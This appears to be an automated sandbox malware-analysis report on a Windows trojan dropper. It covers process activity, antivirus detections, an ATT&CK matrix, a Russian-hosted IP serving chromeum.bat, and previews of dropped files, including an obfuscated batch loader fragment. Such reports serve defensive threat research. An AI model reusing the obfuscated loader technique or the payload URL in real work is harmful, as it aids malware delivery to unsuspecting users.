Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.iniJump to behavior
Source: BWuMwnE7tw.exe, 00000000.00000003.2089161320.000000000086A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&kM
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeAPI call chain: ExitProcess graph end nodegraph_0-3656
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeAPI call chain: ExitProcess graph end nodegraph_0-3670
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\gentee72\chromeum.bat""Jump to behavior
Source: C:\Users\user\Desktop\BWuMwnE7tw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c deldll.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Software Packing
Security Account Manager1
Remote System Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
System Network Configuration Discovery
Distributed Component Object ModelInput Capture11
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets3
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1559092 Sample: BWuMwnE7tw.exe Startdate: 20/11/2024 Architecture: WINDOWS Score: 68 35 Antivirus / Scanner detection for submitted sample 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 AI detected suspicious sample 2->39 7 BWuMwnE7tw.exe 11 2->7         started        process3 dnsIp4 33 82.115.223.189, 49704, 80 MIDNET-ASTK-TelecomRU Russian Federation 7->33 23 C:\Users\user\AppData\Local\...\genteert.dll, PE32 7->23 dropped 25 C:\Users\user\AppData\Local\...\ssleay32.dll, PE32 7->25 dropped 27 C:\Users\user\AppData\Local\...\libeay32.dll, PE32 7->27 dropped 29 C:\Users\user\AppData\Local\Temp\...\guig.dll, PE32 7->29 dropped 11 cmd.exe 1 7->11         started        14 cmd.exe 1 7->14         started        file5 process6 signatures7 41 Uses ping.exe to sleep 11->41 43 Uses ping.exe to check the status of other devices and networks 11->43 16 conhost.exe 11->16         started        18 PING.EXE 1 14->18         started        21 conhost.exe 14->21         started        process8 dnsIp9 31 127.0.0.1 unknown unknown 18->31

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
BWuMwnE7tw.exe23%VirustotalBrowse
BWuMwnE7tw.exe22%ReversingLabsWin32.Trojan.Generic
BWuMwnE7tw.exe100%AviraTR/Dropper.Gen
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\gentee72\guig.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\gentee72\guig.dll1%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\gentee72\libeay32.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\gentee72\ssleay32.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\genteert.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://82.115.223.189/chromeum.bat0%Avira URL Cloudsafe
http://82.115.223.189/chromeum.bat#tempinstpath#chromeum.bat00%Avira URL Cloudsafe
http://www.gentee.comB0%Avira URL Cloudsafe
http://82.115.223.189/chromeum.bat2%VirustotalBrowse
http://82.115.223.189/chromeum.bat#tempinstpath#chromeum.bat02%VirustotalBrowse
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://repository.certum.pl/ctnca.cer09BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drfalse
    high
    http://repository.certum.pl/cscasha2.cer0BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drfalse
      high
      http://crl.thawte.com/ThawteTimestampingCA.crl0BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drfalse
        high
        http://www.gentee.comBBWuMwnE7tw.exe, 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmp, genteert.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        http://82.115.223.189/chromeum.bat#tempinstpath#chromeum.bat0BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111136503.000000000259F000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110378123.00000000021CB000.00000004.00000020.00020000.00000000.sdmpfalse
        • 2%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://crl.certum.pl/ctnca.crl0kBWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drfalse
          high
          http://ocsp.thawte.com0BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drfalse
            high
            http://subca.ocsp-certum.com01BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drfalse
              high
              http://82.115.223.189/chromeum.batBWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111136503.000000000259F000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110378123.00000000021CB000.00000004.00000020.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.certum.pl/CPS0BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drfalse
                high
                http://www.openssl.org/fBWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drfalse
                  high
                  http://crl.certum.pl/cscasha2.crl0qBWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drfalse
                    high
                    http://www.certum.pl/CPS0BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drfalse
                      high
                      http://cscasha2.ocsp-certum.com04BWuMwnE7tw.exe, 00000000.00000002.2111599935.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111471538.0000000002874000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2111212039.0000000002689000.00000004.00000020.00020000.00000000.sdmp, BWuMwnE7tw.exe, 00000000.00000002.2110976596.0000000002380000.00000004.00001000.00020000.00000000.sdmp, ssleay32.dll.0.dr, libeay32.dll.0.drfalse
                        high
                        http://www.openssl.org/support/faq.htmllibeay32.dll.0.drfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          82.115.223.189
                          unknownRussian Federation
                          209821MIDNET-ASTK-TelecomRUfalse
                          IP
                          127.0.0.1
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1559092
                          Start date and time:2024-11-20 07:47:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 12s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:7
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:BWuMwnE7tw.exe
                          renamed because original name is a hash value
                          Original Sample Name:bc9e4510fe172f8155d02b28ab79da83.exe
                          Detection:MAL
                          Classification:mal68.troj.evad.winEXE@10/8@0/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 16
                          • Number of non-executed functions: 12
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          No simulations
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          82.115.223.189file.exeGet hashmaliciousUnknownBrowse
                          • 82.115.223.189/chromeum.exe
                          file.exeGet hashmaliciousUnknownBrowse
                          • 82.115.223.189/chromeum.exe
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          MIDNET-ASTK-TelecomRUfile.exeGet hashmaliciousUnknownBrowse
                          • 82.115.223.189
                          file.exeGet hashmaliciousUnknownBrowse
                          • 82.115.223.189
                          file.exeGet hashmaliciousClipboard HijackerBrowse
                          • 82.115.223.222
                          PhysXCooking64.dll.dllGet hashmaliciousBazar LoaderBrowse
                          • 82.115.223.39
                          FW3x3p4eZ5.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                          • 82.115.223.39
                          PhysXCooking64.dll.dllGet hashmaliciousBazar Loader, BruteRatelBrowse
                          • 82.115.223.39
                          Document-19-36-27.jsGet hashmaliciousUnknownBrowse
                          • 82.115.223.150
                          meliwe_gown_x64.dll.dllGet hashmaliciousUnknownBrowse
                          • 82.115.223.150
                          Document-19-36-27.jsGet hashmaliciousUnknownBrowse
                          • 82.115.223.150
                          Document-19-29-20.jsGet hashmaliciousUnknownBrowse
                          • 82.115.223.150
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\gentee72\guig.dll2GAcJejuxn.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, zgRATBrowse
                            WinRxPharmacyV9Install.exeGet hashmaliciousUnknownBrowse
                              2_CommonDLLs.exeGet hashmaliciousUnknownBrowse
                                P82sELZT1T.exeGet hashmaliciousUnknownBrowse
                                  tdCIOK6xpK.exeGet hashmaliciousUnknownBrowse
                                    Ac372JNTO6.exeGet hashmaliciousAmadeyBrowse
                                      setup.exeGet hashmaliciousUnknownBrowse
                                        70tFZjVOrw.exeGet hashmaliciousUnknownBrowse
                                          Process:C:\Users\user\Desktop\BWuMwnE7tw.exe
                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):200
                                          Entropy (8bit):4.754018559611602
                                          Encrypted:false
                                          SSDEEP:6:hE+skFE8FomBLJrRXlBL79LRLbk3YYUvOxEY:NfE8Fp9JFXl97ptbk3Y9VY
                                          MD5:EA190EF9B139757A890CD48BDD44B0EE
                                          SHA1:95C684E41BF7919408816AAFAB881621FFACE202
                                          SHA-256:9131DE0FCAAF968896AF9D58B6F37B4AA443455BB97C97BC142F295CEE577BC4
                                          SHA-512:22802FFC1965C8E27F799EE88E3FA46DEBB316C27507A570B0812BC5DE0D59A9C2A2105B8CC204851B3C29984EF1DFB7842131819952B185B7E4325A032FB6AD
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:@echo off..for /L %%i in (1,1,10) do (..del "genteert.dll"..if not exist "genteert.dll" goto finish..ping -n 2 -w 1000 127.0.0.1 >nul || ping -n 2 -w 1000 ::1 >nul..)..:finish..del "deldll.bat"..cls..
                                          Process:C:\Users\user\Desktop\BWuMwnE7tw.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (56071), with CRLF, CR line terminators
                                          Category:dropped
                                          Size (bytes):2190339
                                          Entropy (8bit):6.021542350846932
                                          Encrypted:false
                                          SSDEEP:24576:FtFgX2MgvZ6i/eezq+nc9/X9PlsZye7yJG6AGhzatAR6Jp0gP9OWEtGAnNgIFXPa:SsL/aLQA3G0Q9MGSFXDEHDsVtUkGX1
                                          MD5:1CEEA4737D17F32BC6C39986F199D43B
                                          SHA1:0214517A97BD62E0863003051F79D2D4B022E678
                                          SHA-256:8FC2246756B8C5356C4D29DFBB20F91817DE2EFEBE52C364198C9869A16C0C4D
                                          SHA-512:50DF7ACC09FFF11202A2425B27C0DBC61143572BF70856A18D27AFE6E8B7205C4B98559136A7A225D89A6CE96542830A404F12999935B26939BB4D28F7785C38
                                          Malicious:false
                                          Reputation:low
                                          Preview:@chcp 65001..set "........=ysWOW6"..:: Jnzonc Pvguy..:: Bsrdelbia..:: Gvfajja..set ".....=shell."..:: Ahoamcd Bobfbxfm Tjzbt..set "......=/h /i "..:: Xzpukutap Ruqydhcyy..:: Qqhngxyi Pmlqdm..set "........=erShel"..:: Sflvm Prchddtmg Hotqbm..:: Lmkxyoybblk Gaiihxqg..:: Fnypkjufs..set "......=C:\Win"..set "........=l\v1.0"..set "........=exe %~0.Ums"..:: Eigdqamp Ktiet..:: Amrbq Kbiydsbfckl Marfjmkz..set ".......=dows\S"..set ".........=echo F"..set ".....=owsPow"..:: Mgqgsqkguas Cigwe Awgjnkph..:: Hgpeve Btwfruhwduf Nmkjxf..:: Yjnkwndlris Qoogo..set "........=4\Wind"..:: Atculh Gtywekljz Fuvjtuiyqim..:: Kdkjzk Fyeuk Mdelaf..:: Qzray Yahzqjdgepw..:: Ddlvjco..set ".........=py /d "..:: Kabgrmw..:: Wtbewq Fwooc..:: Svcihas..set "........=/q /y "..set ".........=\power"..set ".........= | xco"...%.........%%.........%%.........%%........%%...
                                          Process:C:\Users\user\Desktop\BWuMwnE7tw.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):2.6530623787829106
                                          Encrypted:false
                                          SSDEEP:192:mxonubPh9zJCEvCZj6beDKnYFRJvS/QwC3:tubPh9N6N6k3z
                                          MD5:D3F8C0334C19198A109E44D074DAC5FD
                                          SHA1:167716989A62B25E9FCF8E20D78E390A52E12077
                                          SHA-256:005C251C21D6A5BA1C3281E7B9F3B4F684D007E0C3486B34A545BB370D8420AA
                                          SHA-512:9C890E0AF5B20CE9DB4284E726EC0B05B2A9F18B909FB8E595EDF3348A8F0D07D5238D85446A09E72E4FAA2E2875BEB52742D312E5163F48DF4072B982801B51
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 1%, Browse
                                          Joe Sandbox View:
                                          • Filename: 2GAcJejuxn.exe, Detection: malicious, Browse
                                          • Filename: WinRxPharmacyV9Install.exe, Detection: malicious, Browse
                                          • Filename: 2_CommonDLLs.exe, Detection: malicious, Browse
                                          • Filename: P82sELZT1T.exe, Detection: malicious, Browse
                                          • Filename: tdCIOK6xpK.exe, Detection: malicious, Browse
                                          • Filename: Ac372JNTO6.exe, Detection: malicious, Browse
                                          • Filename: setup.exe, Detection: malicious, Browse
                                          • Filename: 70tFZjVOrw.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gOlP#...#...#...u1..&...#...'...#...b...A1.......1..*....1.. ...Rich#...................PE..L......U...........!.........0............... ...............................P.......................................'......h!...............................@..(.................................................... ..(............................text............................... ..`.rdata....... ....... ..............@..@.data........0.......0..............@....reloc.......@.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\BWuMwnE7tw.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):1471856
                                          Entropy (8bit):6.829825814674756
                                          Encrypted:false
                                          SSDEEP:24576:LPQ+KpP0zhZ3gSHIjkkAf9v5jPSG9LZs7Av4aS4nYIMc9moiYplUmwBvWZK/hH1b:8ogSLdehClSuELxumKWiP8fq5a1mpbkp
                                          MD5:EC8B923F28B999650F35F0DB6365081B
                                          SHA1:24082734657C431F7D5B457D0EBBEBBFADD94012
                                          SHA-256:C88CC0DB0B53652B804BB0C84CE6E8159B146D91BE799E0B1F9DE88C0D7CE0AB
                                          SHA-512:248E3515C44AA144399E3BFE16FBA6088CBB19578C45FE31EDB9959FA135CEB7E208399EE5AD5F88F24D36E8088268F27E67EC33CE45CB4049F1F9D0B2B0B407
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L....$y]...........!.....v................................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....t.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\BWuMwnE7tw.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):11371
                                          Entropy (8bit):7.965755736146497
                                          Encrypted:false
                                          SSDEEP:192:9KvwkHcJ1zM6fIWjw7uj8J0b1OrogqUK6+ny4v7D/87WC5WqpTo8d4wJvv:9Kv/C1zpfIWE7uOAOrofLXyA/wtbpUjk
                                          MD5:D3BA2B6818441516E2128E71B6BC7E15
                                          SHA1:A0475BBE6E30252C29FB9462711E015654E61CEF
                                          SHA-256:A43958682DFBE33FD4C2FD2771F735B087E61E40312108D3B5E8C6A64CF6DC31
                                          SHA-512:621BBD2B32118551480308CB674C919E70E6AE6B1E9B649A5CEF6C443332A57D6311F0DE6DE6970F81BBBF2B0A84D2B5DF9E15B7E9318D577319C2EF9216CCF6
                                          Malicious:false
                                          Preview:GEA...._.........9.............+..........k,..............k,.....................9..m...............lXV. ...english.lng.@..E.Gg.....................&.....default - 1.bmp.@.BQ.Gg....P......................install - 1.bmp..........W+D......D.A....).("...7.n....Ie.W..dy..g....G..\.Qy./Uv....n+.....Dx....;.*...`g...-....N.D8NP..M.U.20t...2.P...3.U.!^.AN..q.\.,)..BR.3z....=.U.M.[.,.0=.+UW|..r.H(PIJ.V....y.Y........HPN(cW......|O..q.a.x.rP.[......)..g#.?...ak.H.4a.......k.f...,....1bD.n.....J...Z..<j...n.2b...4.L.i..(p..7.XS)e...Vf3.....f.`.U.f$9........~v..$#.^"..:.;d..w<./.(.o...$h.\.`.w!..a...........M..........;.......*.b....b..*....*.*#........im.....m......B..@A...........>N....:l.&.v..;.c#..l..~.......p.t.s>...W7.\....o}.N...$......'L...f.7.[...7U......|.o..q....?'n......3..`........RRR221....RQ..Q..'...vz....C....dd$.....y..Z.o...yz.j.Z.YI....S.R..@._5....?.~.W*.5......P'W.K....F....K.....r...T..M&Lj..o..9.....DN...n.^Q.B.{..g._].^..;..u
                                          Process:C:\Users\user\Desktop\BWuMwnE7tw.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):392048
                                          Entropy (8bit):6.542966608472866
                                          Encrypted:false
                                          SSDEEP:6144:yeIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbu:yeIwnft+S34NVSTQD+oVbKQfrC/1ct26
                                          MD5:9097F59E266183424D5C66C14DFA92D9
                                          SHA1:BF5E7E18054CA03CEE3F161C9E989581C4A8A0D7
                                          SHA-256:7A8DF4A622C1DFB87E33B6FA8E9056AC64A65A91D9B15CAC1928ED2B40250BCD
                                          SHA-512:BB1A152C4FCBF3C187AE52541CF31F342D37311BEBB8CF29B0DB5A9868FC40F8AE0502E7A7D8363BEE758ACF1DAF440419FA301AF44F5D13624D4B7B43B034C0
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4*.$QN.%4*.$.N.%4*.$IN.%4*.$YN.%.*.$HN.%.*.$GN.%.*.$KN.%.*.$XN.%[N.%.O.%.*.$iN.%.*.$ZN.%.*e%ZN.%.*.$ZN.%Rich[N.%........PE..L....$y]...........!.....8..........^7.......P......................................O^....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\BWuMwnE7tw.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):61440
                                          Entropy (8bit):5.391391128836901
                                          Encrypted:false
                                          SSDEEP:768:BVPbKk9022j0efXs6X8zqk3pT3oMapzxc7Ep+DnSIiacDwGpr1a:BVTK+022j0V6mqMozpzxcXOpwEr1
                                          MD5:6CE814FD1AD7AE07A9E462C26B3A0F69
                                          SHA1:15F440C2A8498A4EFE2D9BA0C6268FAB4FB8E0A7
                                          SHA-256:54C0DA1735BB1CB02B60C321DE938488345F8D1D26BF389C8CB2ACAD5D01B831
                                          SHA-512:E5CFF6BCB063635E5193209B94A9B2F5465F1C82394F23F50BD30BF0A2B117B209F5FCA5AA10A7912A94AD88711DCD490AA528A7202F09490ACD96CD640A3556
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]=|..\...\...\...@...\...\..P\..{C...\...C..9\...Z...\...C...\..Rich.\..................PE..L.....FM...........!.........`.................................................................................................P....................................................................................................................text...t........................... ..`.rdata........... ..................@..@.data...\...........................@....rsrc...............................@..@.reloc.."...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\PING.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):331
                                          Entropy (8bit):4.92149009030101
                                          Encrypted:false
                                          SSDEEP:6:PzLSLzMRfmWxHLThx2LThx0sW26VY7FwAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpTeT0sBSAFSkIrxMVlmJHaVzvv
                                          MD5:2E512EE24AAB186D09E9A1F9B72A0569
                                          SHA1:C5BA2E0C0338FFEE13ED1FB6DA0CC9C000824B0B
                                          SHA-256:DB41050CA723A06D95B73FFBE40B32DE941F5EE474F129B2B33E91C67B72674F
                                          SHA-512:6B4487A088155E34FE5C642E1C3D46F63CB2DDD9E4092809CE6F3BEEFDEF0D1F8AA67F8E733EDE70B07F467ED5BB6F07104EEA4C1E7AC7E1A502A772F56F7DE9
                                          Malicious:false
